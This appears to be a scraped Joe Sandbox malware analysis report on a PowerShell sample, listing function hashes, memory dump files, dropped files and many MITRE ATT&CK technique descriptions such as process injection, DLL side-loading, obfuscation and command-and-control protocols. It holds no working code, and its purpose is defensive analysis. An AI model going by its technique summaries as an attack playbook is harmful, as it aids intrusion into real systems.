Instruction ID: 941da2f0c8b4f8746d71d0657fd111bd1682a9df583979ff8851996dbd6ec3bc
Opcode Fuzzy Hash: 8de872bf5130bac926e8e2820dc6ecb3b42950cc877b99523613d6d677edbae8
Instruction Fuzzy Hash: D601806104E3C09ED7128B258C94762BFB4DF43224F1DC0DBD8888F1A7C2694849CB72

Function 02E6D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2243098193.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3cee868071c7558936e60c52be2f1566eb70d31b3567fd090d98dfbae523b14
Instruction ID: ec46d907c90fc530dc8cb7a1a855b64d27fb96d9053cf55214e106cc5da10c4c
Opcode Fuzzy Hash: b3cee868071c7558936e60c52be2f1566eb70d31b3567fd090d98dfbae523b14
Instruction Fuzzy Hash: EE012B31284340DAD7608A15CD88B77FF9CEF853B8F18C42AED484B246C3799845CAB1

Non-executed Functions

Function 075C0308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4']q, xrefs: 075C0373
4']q, xrefs: 075C037F
$]q, xrefs: 075C0352
$]q, xrefs: 075C035E

Memory Dump Source

Source File: 00000008.00000002.2285497445.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 78d647ad2e3c782fc00e78c673c86ccf33abe20c04224078fef39736c8b16f61
Instruction ID: 810f5d6e35b2ae34d818208c3ddd3f93e17550a4b97b40192a331cfad96bf907
Opcode Fuzzy Hash: 78d647ad2e3c782fc00e78c673c86ccf33abe20c04224078fef39736c8b16f61
Instruction Fuzzy Hash: D501F761B4D395CFC72B52BC29202A63FF6AFC395072A44EBC045CB296C9294C49C7A7

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2 ps1.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Package.exe_55a92a429a98c25290d2b6d865f190a11d46a9_8a8df546_3612ac26-7d59-450f-a365-58a4a19527e4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E5B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F27.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70AF.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RES4C9B.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g0oggsa.xw4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cf2yuriw.cdh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fg4uv1vj.wrb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouvqs2i0.1pp.psm1

Windows Analysis Report
2 ps1.ps1

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre